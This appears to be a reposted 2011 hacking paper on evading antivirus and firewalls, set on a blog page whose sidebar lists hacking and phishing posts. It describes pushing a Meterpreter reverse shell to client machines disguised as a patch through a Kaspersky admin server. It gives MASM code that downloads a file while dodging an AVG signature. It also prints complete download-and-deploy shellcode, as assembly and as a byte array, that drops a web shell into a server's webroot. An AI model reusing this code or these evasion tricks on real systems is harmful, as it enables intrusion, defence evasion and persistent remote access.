[B]# Date: [18/1/2011]
# Paper Title: Antivirus/ Firewall Evasion Techniques: Evolution of Download Deploy Shellcode
# Date: [18/1/2011]
# Author: [FB1H2S]
# htpp://Garage4Hackers.com http://fb1h2s.com
#All greets to Garage Hackers Members.
# I love to start with greets
# and to NUll and Andhrahackers people
#Special thanks to w3bd3vil(null), rohith, ricks2600, prashant(null)
#
################################################## #########################
Overview:
The effectiveness of an Anti virus/ Firewall is highly valued to it customers and in scenarios of a PenTest. This post
talks about a serious of observations and techniques tried in order to bypass AV and evaluate AV/Firewall's
effectiveness and the development of Download Deploy payload .
What made me write this
I was assigned with a PT last week which we were able to achieve 100% percent success. And the success rate were
because of an Anti virus Server, ok here is the incident.
After completing VA we moved on to PT, a good no of un patched windows systems were spotted so we armed msf(Metsploit)
and started shooting, but exploits failed , and no metpreters or Cmd shells came back. Well all because of a stupid AV
server. A Kasper-sky server was running and that was used to manage the entire network. Well payload encoding work
but, certain vulnerabilities multiple exploitation is not possible so if you fail first you will lose the game, so
different ideas and taught s poped in my head and this paper is an implementation of that.
Any was we dint give up and started attacking the AV Admin server itself , and woot woot we were in.
"",and that is not the point , the point is IAm not gone mention how I got in coz u will laugh
was able to get an RDP to Kaspersky admin server machine. And the fun begins.
As it was Kasper-sky Admin server, and all the network machines were connected to it, and Admin server manages
everything form updating individual computers with updates form patching the server.
Screenshots not live: form Kaspersky website:
What quickly strike me was the Push patches options which was used to update client computer with patches , quick
taught !what If I make a Metpreter_reverse_tcp and push it as a patch to the client computers will it work ??
Steps
[+] Made the metpreter and moved to Admin server
[-] Admin server dint detect the default non encoded metpreter as a virus , No idea why :O
[+] Shut down the remote AV client form admin server
[-] Kaspersky Admin kit had a feature to build an installer out of an executable
[+] Converted the metpreter .exe to .msi installer, seems like the AV signs the payload when this is done
[+] Pushed it to client
And royal woot woot we had a metpreter, same way we could have shelled the entire network , took enough POCs and
headed home.
Thanks to D4rkest for his great support and ideas .
Well PT was over but few question remained
And the best way to hack an application is RTFM[Read the f$$$$$# manual]
http://utils.kaspersky.com/docs/engl...admguideen.pdf
[1] Why did the AV admin server dint detect the Msf non encoded payload when moved to admin server, when it was
getting detected on client machines?
[2] I had situation before too, were server was behind a firewall and was not able to get reverse/bind shell because
of AV/Firewall, I need a way to bypass that.
[3] Will the things I did above could be done with a domain controller too?
Answer to Q no [3] by Wipu " Punter" suggested a better statergy which he tried before.
[-] Make a VBS or Bat script which creates a new user and then enable telnet.
[-] Push the script as update , simple and very effective"
Question No [1] and [2]'s answer is what this paper is all about
Anti Virus Evading techniques. and analyzing the quality of an AV
Signature based detection: Analyzing Efficacy and Bypassing detection
Wiki: http://en.wikipedia.org/wiki/Antivirus_software
Compares the contents of a file to a dictionary of virus signatures.
Analyzing the efficacy of an AV:
Test 1
Testing for false positives, I started with a simple test shell code program, a skeleton that's used to execute test
shell codes, added few Nop instruction to it, "currently the exe is absolutely harmless".Uploaded to Virus total and obtained the following results.Code:#include<stdio.h>
char code[]="/x90/x90";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
Here
Here:Ya one False positive: Quick heal proved that its India's own product :PCAT-QuickHeal 11.00 2011.01.17 Trojan.Agent.IRC
Result:
1/ 43 (2.3%)
[-] Moved form C to ASM as now we could strike a little deeper
[-] Build a quick download virus to destination payloadAnd on compiling and linking the application itself my AVG scanner popped alerting me about the payload.Code:;-------------------------------------------
; Comilied with MASM32
.586
.model flat,stdcall
option casemap:none
include C:\masm32\include\windows.inc
include C:\masm32\include\user32.inc
include C:\masm32\include\kernel32.inc
include C:\masm32\include\shell32.inc
include C:\masm32\include\urlmon.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\urlmon.lib
.data
URL db "http://110.0.0.1:84/msgbox.exe",0
EXIT db "ExitProcess"
PATH db "c:\testsas.exe",0
.data
res dd ?
.code
; --------------------http://FB1H2S.com fb1h2s
http://Garage4Hackers.com-------------------------------------------------------
start:
invoke URLDownloadToFile,0,addr URL,addr PATH,0,0
invoke ExitProcess,0
end start
So function calls Urldownloadtofile + Exit process the combination would be what AVG would have build its signature
with. Ok so what if I remove Exitprocess and compile the program.With out exit function the payload still worksCode:;-------------------------------------------
; Comilied with MASM32
.586
.model flat,stdcall
option casemap:none
include C:\masm32\include\windows.inc
include C:\masm32\include\user32.inc
include C:\masm32\include\kernel32.inc
include C:\masm32\include\shell32.inc
include C:\masm32\include\urlmon.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\urlmon.lib
.data
URL db "http://110.0.0.1:84/msgbox.exe",0
EXIT db "ExitProcess"
PATH db "c:\testsas.exe",0
.data
res dd ?
.code
; --------------------http://FB1H2S.com fb1h2s
http://Garage4Hackers.com-------------------------------------------------------
start:
invoke URLDownloadToFile,0,addr URL,addr PATH,0,0
end start
The output executable was scanned and and my AVG said it was clean.
And that's how signature based detection works how dump its.
Heuristics: Considering shell codes its not affected much
Runs the payload on a sandbox and identifies the behavior: AV plants hooks to certain critical system calls and
monitors those activities , so Reverse/Bind shell and socket operations are at times an Issue.
So the taught is how to bypass Signature Detection + Above mentioned Heuristics + Firewall issuesNo way this could escape the heuristic behavior , well downloading a program won't create much panic butDownLoadFile + ExcuteFile + ExitProcess
trying to execute it would cause suspicion .Well obviously it would not be of any use if the payload just downloads
the file and dsn't trigger it, and triggering it is were the problem occurs.[+] Download Execute will cause troubles to our payload.So whats the alternative ??.
[-] If we just download the executable that wont be of any use
[+] And AV/Firewall could make situations tough by not letting us give reverse shell
[+] And if the application we are targeting[Apache old version] is behind a firewall and even if we were able to
execute code we cant get a shell back because of the firewall.
[-] So why not use a web shell
[+] A payload that would download a web shell and place it on the servers WebRoot directory. Or simply drops a web
shell
All firewall let's web server's traffic and WebSell's "Hardly I have seen any getting detected by AV" . So that
budded the idea of a Download + Deploy payload.You could get a semi interactive shell and will work fine even in case of AV and firewall.Download + Executes triggers AV alert
So just Download a WebShell and drops it in WebRoot
#####################################
# Title
# Date: [18/1/2011]
# Author: FB1H2S
# Tested on: [Works form win xp to Win 7 all versions]
#Downloads file form http://127.0.0.1:84/a.bak >> C:/inetpub/wwwroot/a.asp
#Place the webshell to be uploaded on ur local server webroot
#Current payload data is Hard coded with Url and path need suggestions and will convert to MSF
################################################## ############
Assembly Code:Test the Shell Code:Code:;# Title:Download Deploy Shell code by FB1H2S
;# Date: [18/1/2011]
;# Author: FB1H2S http://Garage4hackers.com http://fb1h2s.com
;# Tested on: [win xp, works up to Win 7 all versions]
;
;#File: Download_deploy.asm
;
[BITS 32]
global _start
_start:
jmp short entry ;
%include "kernal32.asm"
begin:
call find_kernel32
mov ebx, eax
jmp short u ; Skip
entry:
call begin
u:
push 0xec0e4e8e ; LoadLibraryA hash
push ebx ; kernel32 base address
call find_function ; find address
; LoadLibraryA
PUSH 0x00206e6f
PUSH 0x6d6c7275
xor ecx, ecx
mov [esp + 9],cl
mov ecx , esp
push ecx
call eax ; eax holds our function address
download:
push 0x702f1a36 ; URLDownloadToFileAhash
push eax ; u-lmon.dll base address
call find_function ; find address
pop edi
xor ebp, ebp
PUSH 0x58202020 ; path to deploy
PUSH 0x7073612e
PUSH 0x735c746f
PUSH 0x6f727777
PUSH 0x775c6275
PUSH 0x7074656e
PUSH 0x495c3a43
mov ebp , esp
xor ecx, ecx ; ecx = 0 we need it for some time
mov [ebp + 24], cl ;ebp no null
PUSH 0x58202065 ; url to file
PUSH 0x78652e61
PUSH 0x2f34383a
PUSH 0x312e302e
PUSH 0x302e3732
PUSH 0x312f2f3a
PUSH 0x70747468
mov edi, esp
mov [edi + 25], cl ; edi no null
push ecx ; lpfnCB
push ecx ; dwReserved
push ebp ; szFileName
push edi ;url
push ecx ; pCaller
call eax ; eax holds our function address
exit:
push 0x73e2d87e ; ExitProcess hash
push ebx ; kernel32 base address
call find_function ; find address
; ExitProcess
call eax ; holds our function address
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;#
;#
;#Code file: kernal.asm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
find_kernel32:
xor eax, eax ; clear eax
mov eax, [fs:0x30 ] ; pointer to the PEB
mov eax, [ eax + 0x0C ] ; get PEB->Ldr
mov eax, [ eax + 0x14 ] ; get PEB->Ldr.InMemoryOrderModuleList.Flink
; (1st entry)
mov eax, [ eax ] ; (2nd entry)
mov eax, [ eax ] ; (3rd entry)
mov eax, [ eax + 0x10 ] ;3rd entries base address
; eax = kernel32.dll works on all windows versions xp to win 7
ret
find_function:
pushad ; Save all registers
mov ebp, [esp + 0x24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 0x78]
add edx, ebp
mov ecx, [edx + 0x18]
mov ebx, [edx + 0x20]
add ebx, ebp
find_function_loop:
jecxz find_function_finished
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
compute_hash:
xor edi, edi ; Zero edi
xor eax, eax ; Zero eax
cld ; Clear direction
compute_hash_again:
lodsb ; Load the next byte from esi into al
test al, al ; Test ourselves.
jz compute_hash_finished ; If the ZF is set, we've hit the null term.
ror edi, 0xd ; Rotate edi 13 bits to the right
add edi, eax ; Add the new byte to the accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished:
find_function_compare:
cmp edi, [esp + 0x28]
jnz find_function_loop
mov ebx, [edx + 0x24]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 0x1c]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
mov [esp + 0x1c], eax
find_function_finished:
popad ; Restore all registers
retCode:// Download file form location
//Url hardcoded so not Use full for all yet
#include<stdio.h>
char code[] = "\xeb\x70\x31\xc0\x64\xa1\x30\x00"
"\x00\x00\x8b\x40\x0c\x8b\x40\x14"
"\x8b\x00\x8b\x00\x8b\x40\x10\xc3"
"\x60\x8b\x6c\x24\x24\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a"
"\x18\x8b\x5a\x20\x01\xeb\xe3\x37"
"\x49\x8b\x34\x8b\x01\xee\x31\xff"
"\x31\xc0\xfc\xac\x84\xc0\x74\x0a"
"\xc1\xcf\x0d\x01\xc7\xe9\xf1\xff"
"\xff\xff\x3b\x7c\x24\x28\x75\xde"
"\x8b\x5a\x24\x01\xeb\x66\x8b\x0c"
"\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"
"\x8b\x01\xe8\x89\x44\x24\x1c\x61"
"\xc3\xe8\x94\xff\xff\xff\x89\xc3"
"\xeb\x05\xe8\xf2\xff\xff\xff\x68"
"\x8e\x4e\x0e\xec\x53\xe8\x96\xff"
"\xff\xff\x68\x6f\x6e\x20\x00\x68"
"\x75\x72\x6c\x6d\x31\xc9\x88\x4c"
"\x24\x09\x89\xe1\x51\xff\xd0\x68"
"\x36\x1a\x2f\x70\x50\xe8\x76\xff"
"\xff\xff\x5f\x31\xed\x68\x20\x20"
"\x20\x00\x68\x2e\x61\x73\x70\x68"
"\x6f\x74\x5c\x73\x68\x77\x77\x72"
"\x6f\x68\x75\x62\x5c\x77\x68\x6e"
"\x65\x74\x70\x68\x43\x3a\x5c\x49"
"\x89\xe5\x31\xc9\x88\x4d\x18\x68"
"\x65\x20\x20\x00\x68\x61\x2e\x65"
"\x78\x68\x3a\x38\x34\x2f\x68\x2e"
"\x30\x2e\x31\x68\x32\x37\x2e\x30"
"\x68\x3a\x2f\x2f\x31\x68\x68\x74"
"\x74\x70\x89\xe7\x88\x4f\x1a\x51"
"\x51\x55\x57\x51\xff\xd0\x68\x7e"
"\xd8\xe2\x73\x53\xe8\x0f\xff\xff"
"\xff\xff\xd0";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
[+] Issues: Url and path are Hard Coded so its Use less I published the code to get suggestions so that I could make
an Improved version of code and make a Metsploit module
[-]Currently Web Root path is Hard coded and I cant think about a way if web root is changed
[-] Need a solution to dynamically finds the web roots IIS and Apache to make the Shell code better.
skip to main |
skip to sidebar
Online Wedding Invitation Card Shop
Online Wedding Invitation Card Shop
News, Tips & Tricks for Smartphones & Desktop.
SPONSOR
Online Wedding Invitation Card Shop
Popular Posts
SPONSOR
Online Wedding Invitation Card Shop
Powered by Blogger.
Blog Archive
-
▼
2012
(221)
-
▼
February
(147)
- How to burn ISO to USB - make bootable USB
- Working free Live mobile tv streaming links for an...
- Hack Facebook Password – Facebook Hacking
- Now Firefox 7 available for Android
- Facebook Now Allows any Mobile User to Access Face...
- IP Spoofing Attack and Defenses
- The THC SSL DoS Threat
- LATEST AIRTEL GPRS TRICK WITH FAST SPEED
- Airtel 3G working high speed proxy settings for un...
- Official site of Indian Ethical Hacker Ankit Fadia...
- 3rd time BSNL website Hacked by Pakistan Hackers
- Indian Congress site Hacked & Sonia Gandhi's Profi...
- 50+ websites Hacked By Pak Cyber Combat Squad (PCCS)
- 475 Pakistan and Uk sites hacked by LuCkY & RooT_D...
- Pakistan Hackers Site hacked by Decoder(Indian Hac...
- Symantec Confirmed Norton AV source code exposed b...
- Ghana Bank Websites hacked and Database leaked by ...
- Irish Government Website passwords published by An...
- XWiki Web Application vulnerable to Cross Site Scr...
- Anonymous Hackers leaked FBI hacking investigation...
- Malware steal your Documents and uploads them to S...
- Xss in hrithik roshan's official fan site
- 24+ INDIAN site hacked by An0nym0uz17
- "Password is 123456"~ The First Edition of EHN Mag...
- How to Add Recommended Post slider in each post?:B...
- Recommended Post Slider Widget for Blogger with Fa...
- PenTest Magazine
- How to Set up your Pen Testing / Ethical Hacking L...
- Free Unlimited 3G Internet hack for BSNL
- Set up your own Lab for practicing SQL injection a...
- How to deface website with Cross Site Scripting ? ...
- How to do Cookie Stealing with Cross site Scriptin...
- Complete Cross Site Scripting(XSS) Guide : Web App...
- How to Hack the Windows Admin Password Using OphCr...
- Hacking website using SQL Injection -step by step ...
- How to Hack Facebook Account Using Phising webPage
- Website hacking complete tutorial
- Hotmail Hack info
- Make ur own Radio station
- Make keygen yourself of anysoftware
- How to set up ftp server on your own
- Mobile Hack Tool 2.10 Ultimate by crack0hack
- Hacking Web Applications Using Cookie Poisoning
- Hacking Webpages - The Ultimate guide
- Hacking Servers A Beginner's Guide
- Hacking step by step User's guide
- Idea Hack for Free GPRS
- Ra.ONE THE GAME (PS2 FOR PC) 320 MB ONLY — Playsta...
- Mobile Phone Hacking Software 2012 | Bluetooth mob...
- Hack Yahoo Email And Password Using Yahoo Phishing...
- AIRCEL Free GPRS Hacking Trick 2012 | AIRCEL Hack ...
- REFREF - DDOS TOOL BY THE ANONYMOUS
- IE9 EXPLOIT PUTS WINDOWS 7 SP1 AT RISK
- LULZSEC MEMBER SITE GOT DEFACED BY TEAM POISON
- MYSQL & MSSQL INJECTION
- DDOS USING GOOGLE SERVERS
- SLAAC Attack – 0day Windows Network Interception C...
- How Hackers Target and Hack Your Site
- Step-by-Step Reverse Engineering Malware: ZeroAcce...
- Google Hacking: Amazon’s CloudFront
- LOIC (Low Orbit Ion Cannon) – DOS attacking tool
- Vodafone Free Gprs Tricks:New Vodafone Default Bro...
- How to Get on Page One of Google
- Airtel New Handler Trick Using Twitter For Free 2g...
- UCWEB 8 & OPERA 6.5 FREE ON AIRTEL
- HACK AIRTEL 2 LATEST WORKING TRICK
- AIRTEL FREE GPRS WITH OPERAMINI 11.10 By Mukesh
- AIRTEL LIVE CRICKET SCORE TRICKS
- AIRTEL ROCKING VPN TRICK 3G 2G FREE NET ON PC LIKE...
- Penetration testing - [Story of a sucessfull PT on...
- Detecting Web application firewall during Pentesting
- Penetration testing - [Intel CBA CreateProcess() o...
- Penetration testing - [MSSQL P4wnage]
- Windows Link exploit (shortcut file) race conditio...
- Heap Spray --- Slipping CPU to our pocket--continued
- Evading AV Signatures..Derailing the Antivirus--"v...
- Demystifying The Ashi virus--"mukesh" PART II
- Demystifying The Ashi virus--"mukesh" PART III
- Story of a PoC - F5 BIG-IP Cookie Information Disc...
- Cracking Salted Hashes
- Automating WEP hack - Shell Script
- XSS too Root
- Malware Analyser 2.7
- Bypassing a Cisco IOS firewall
- Antivirus/ Firewall Evasion Techniques: Evolution ...
- Effectiveness of Antivirus in Detecting Web Applic...
- An ARP Cache Poisoning prevention PoC tool
- Penetration Testing Biometric System: Part II:- Re...
- Penetration Testing Biometric System: Part 1 Local...
- [PY] G4H// Anti-Intruders System Cleaner ver 0.1
- Database protection Techniques : a different presp...
- BSNL router hacking and possibility of running cus...
- WebBackdoors , Attack, Evasion and Detection:
- Windows 8 DEP bypass
- Enumerating and Breaking VoIP
- Hacking the Time
- John The Ripper (JTR) - Tweak That Attack!
- Breaking The Crypt - Advanced Hash Cracking
- Remove Brontok Virus Urself
- crack windows passwords
-
▼
February
(147)
Copyright
Mobizet.
Designed by Website Hosting Reviews - vps hosting reviews, SEO from WMG, Mortgage Brokers